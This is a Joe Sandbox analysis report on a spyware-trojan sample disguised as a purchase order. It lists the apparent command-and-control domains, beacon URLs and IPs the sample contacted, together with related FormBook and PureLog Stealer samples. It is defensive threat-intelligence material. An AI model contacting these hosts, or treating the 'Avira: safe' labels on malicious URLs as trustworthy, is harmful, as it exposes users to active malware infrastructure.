                      PO -2025918.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.qzsazi.info/bqha/?V0=XaQS++1s5Z2sQk6g657UrSdcX7H3EUdTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE6ZdUGRZN1xACtCVpUj7MYkJvH6jcy3tgXEM=&6NWT=ubtLSzl0%Avira URL Cloudsafe
                      http://www.zucchini.pro/tqv2/?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw=0%Avira URL Cloudsafe
                      http://www.100millionjobs.africa/ktot/0%Avira URL Cloudsafe
                      https://www.fasthosts.co.uk/domain-names/search/?domain=$0%Avira URL Cloudsafe
                      http://www.qzsazi.info/bqha/0%Avira URL Cloudsafe
                      http://www.letsbookcruise.xyz0%Avira URL Cloudsafe
                      http://www.aloezhealthcare.info/he9k/?V0=0MI6+xzwqxZaqD2fSvbI+Ez0sKo1K30QNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOzrl593t+ZyNHd/O+D84ZuyAEiK4V6BaRopc=&6NWT=ubtLSzl0%Avira URL Cloudsafe
                      http://www.truckgoway.info/m320/?V0=Ph0JwVcw7zzuTeHjokN+Pj0vqxzi/qoK5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsnmjV2eR6T95oFo+TtC+4wolZhiL0ouse1nU=&6NWT=ubtLSzl0%Avira URL Cloudsafe
                      http://www.aloezhealthcare.info/he9k/0%Avira URL Cloudsafe
                      http://www.actionhub.live/gq43/0%Avira URL Cloudsafe
                      http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg90%Avira URL Cloudsafe
                      https://static.fasthosts.co.uk/icons/favicon.ico0%Avira URL Cloudsafe
                      http://www.letsbookcruise.xyz/coi2/0%Avira URL Cloudsafe
                      http://www.100millionjobs.africa/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s=0%Avira URL Cloudsafe
                      http://www.truckgoway.info/m320/0%Avira URL Cloudsafe
                      http://www.vh5g.sbs/0%Avira URL Cloudsafe
                      http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&amp;V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg90%Avira URL Cloudsafe
                      https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par0%Avira URL Cloudsafe
                      https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_0%Avira URL Cloudsafe
                      http://www.vh5g.sbs/54nj/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.qzsazi.info
                      		47.83.1.90
                      		truefalse
                        		unknown
                        www.aloezhealthcare.info
                        		213.171.195.105
                        		truefalse
                          		unknown
                          truckgoway.info
                          		84.32.84.32
                          		truefalse
                            		unknown
                            www.zucchini.pro
                            		13.248.169.48
                            		truefalse
                              		unknown
                              www.vh5g.sbs
                              		188.114.97.3
                              		truefalse
                                		unknown
                                www.actionhub.live
                                		67.223.117.189
                                		truefalse
                                  		unknown
                                  100millionjobs.africa
                                  		136.243.64.147
                                  		truefalse
                                    		unknown
                                    natroredirect.natrocdn.com
                                    		85.159.66.93
                                    		truefalse
                                      		high
                                      www.100millionjobs.africa
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.v89ey584d.shop
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.truckgoway.info
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.letsbookcruise.xyz
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.x3kwqc5tye4vl90y.top
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.hwak.live
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.zucchini.pro/tqv2/?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw=false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.actionhub.live/gq43/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.qzsazi.info/bqha/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.qzsazi.info/bqha/?V0=XaQS++1s5Z2sQk6g657UrSdcX7H3EUdTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE6ZdUGRZN1xACtCVpUj7MYkJvH6jcy3tgXEM=&6NWT=ubtLSzlfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.100millionjobs.africa/ktot/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.aloezhealthcare.info/he9k/?V0=0MI6+xzwqxZaqD2fSvbI+Ez0sKo1K30QNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOzrl593t+ZyNHd/O+D84ZuyAEiK4V6BaRopc=&6NWT=ubtLSzlfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.truckgoway.info/m320/?V0=Ph0JwVcw7zzuTeHjokN+Pj0vqxzi/qoK5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsnmjV2eR6T95oFo+TtC+4wolZhiL0ouse1nU=&6NWT=ubtLSzlfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.aloezhealthcare.info/he9k/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.letsbookcruise.xyz/coi2/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.100millionjobs.africa/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s=false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.truckgoway.info/m320/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.vh5g.sbs/54nj/false
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designersGPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers/?PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/bThePO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designers?PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.fasthosts.co.uk/domain-names/search/?domain=$ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tiro.comPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.com/designersPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.goodfont.co.krPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.sajatypeworks.comPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.typography.netDPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.founder.com.cn/cn/cThePO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://fasthosts.co.uk/nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.galapagosdesign.com/staff/dennis.htmPO -2025918.exe, 00000000.00000002.1879163401.0000000005119000.00000004.00000020.00020000.00000000.sdmp, PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.galapagosdesign.com/DPleasePO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.fonts.comPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sandoll.co.krPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.urwpp.deDPleasePO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.zhongyicts.com.cnPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO -2025918.exe, 00000000.00000002.1865271514.000000000279D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.sakkal.comPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.letsbookcruise.xyznWrCyfejRZk.exe, 0000000A.00000002.3543046045.00000000058EC000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.apache.org/licenses/LICENSE-2.0PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.fontbureau.comPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9ROUTE.EXE, 00000009.00000002.3541757344.00000000042EC000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003E3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ecosia.org/newtab/ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.carterandcone.comlPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://ac.ecosia.org/autocomplete?q=ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.fontbureau.com/designers/cabarga.htmlNPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.founder.com.cn/cnPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.jiyu-kobo.co.jp/PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://static.fasthosts.co.uk/icons/favicon.icoROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.fontbureau.com/designers8PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&amp;V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9ROUTE.EXE, 00000009.00000002.3541757344.00000000042EC000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003E3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.vh5g.sbs/ROUTE.EXE, 00000009.00000002.3541757344.0000000003E36000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003986000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          13.248.169.48
                                                                                                                          		www.zucchini.proUnited States
                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                          67.223.117.189
                                                                                                                          		www.actionhub.liveUnited States
                                                                                                                          		15189VIMRO-AS15189USfalse
                                                                                                                          188.114.97.3
                                                                                                                          		www.vh5g.sbsEuropean Union
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          47.83.1.90
                                                                                                                          		www.qzsazi.infoUnited States
                                                                                                                          		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                                                                                                          84.32.84.32
                                                                                                                          		truckgoway.infoLithuania
                                                                                                                          		33922NTT-LT-ASLTfalse
                                                                                                                          136.243.64.147
                                                                                                                          		100millionjobs.africaGermany
                                                                                                                          		24940HETZNER-ASDEfalse
                                                                                                                          85.159.66.93
                                                                                                                          		natroredirect.natrocdn.comTurkey
                                                                                                                          		34619CIZGITRfalse
                                                                                                                          213.171.195.105
                                                                                                                          		www.aloezhealthcare.infoUnited Kingdom
                                                                                                                          		8560ONEANDONE-ASBrauerstrasse48DEfalse

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                          Analysis ID:1592062
                                                                                                                          Start date and time:2025-01-15 18:14:03 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 9m 31s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Run name:Run with higher sleep bypass
                                                                                                                          Number of analysed new started processes analysed:11
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:2
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:PO -2025918.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@10/7@11/8
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 75%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 91%
                                                                                                                          • Number of executed functions: 180
                                                                                                                          • Number of non-executed functions: 291
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          No simulations

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          13.248.169.48MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.bonheur.tech/t3iv/
                                                                                                                          trow.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • www.findbc.com/
                                                                                                                          QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • www.hasan.cloud/ve8l/
                                                                                                                          HN1GiQ5tF7.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.optimismbank.xyz/lnyv/
                                                                                                                          qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.tals.xyz/k1td/
                                                                                                                          8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.bcg.services/5onp/
                                                                                                                          z6tNjJC614.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.tals.xyz/cpgr/
                                                                                                                          rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.lirio.shop/qp0h/
                                                                                                                          ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.10000.space/3zfl/
                                                                                                                          n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.lovel.shop/rxts/
                                                                                                                          67.223.117.189PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • www.actionhub.live/gq43/
                                                                                                                          foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.gutpox.life/bcpd/
                                                                                                                          w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.uburn.xyz/iqqs/
                                                                                                                          enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.uburn.xyz/iqqs/
                                                                                                                          PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.heldhold.xyz/fava/
                                                                                                                          rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.heldhold.xyz/fava/
                                                                                                                          Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.uburn.xyz/iqqs/
                                                                                                                          AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.uburn.xyz/unks/
                                                                                                                          ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.uburn.xyz/unks/
                                                                                                                          DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.heldhold.xyz/fava/

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          natroredirect.natrocdn.comPO-DOC1522025-12.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          Payment Notification Confirmation 010_01_2025.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          HN1GiQ5tF7.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          bIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          WBI835q8qr.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          www.zucchini.proPO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 199.59.243.228
                                                                                                                          Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 199.59.243.228
                                                                                                                          rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 199.59.243.228
                                                                                                                          www.qzsazi.infoPO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 47.83.1.90
                                                                                                                          www.aloezhealthcare.infoPO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 213.171.195.105
                                                                                                                          www.actionhub.livePO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 67.223.117.189
                                                                                                                          www.vh5g.sbsPO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          CLOUDFLARENETUSEZsrFTi.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          random.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                                          • 104.21.21.16
                                                                                                                          NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.96.1
                                                                                                                          https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.79.87
                                                                                                                          DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          firstontario.docxGet hashmaliciousUnknownBrowse
                                                                                                                          • 1.1.1.1
                                                                                                                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.67.165
                                                                                                                          https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.78.33
                                                                                                                          https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''Get hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          AMAZON-02UStxWVWM8Kx4.dllGet hashmaliciousWannacryBrowse
                                                                                                                          • 52.34.64.1
                                                                                                                          hNgIvHRuTU.dllGet hashmaliciousWannacryBrowse
                                                                                                                          • 13.229.164.57
                                                                                                                          https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                                                                                                                          • 18.245.46.111
                                                                                                                          q4e7rZQEkL.dllGet hashmaliciousWannacryBrowse
                                                                                                                          • 54.76.228.176
                                                                                                                          firstontario.docxGet hashmaliciousUnknownBrowse
                                                                                                                          • 54.69.238.133
                                                                                                                          ACH REMITTANCE DOCUMENT 15.01.25.xlsbGet hashmaliciousUnknownBrowse
                                                                                                                          • 54.176.115.71
                                                                                                                          bot.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.214.77.3
                                                                                                                          bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 44.232.80.77
                                                                                                                          bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 52.77.51.103
                                                                                                                          bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 54.200.242.19
                                                                                                                          VIMRO-AS15189USPO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 67.223.117.189
                                                                                                                          Scanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 67.223.117.142
                                                                                                                          ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 67.223.118.94
                                                                                                                          Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 67.223.117.169
                                                                                                                          specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
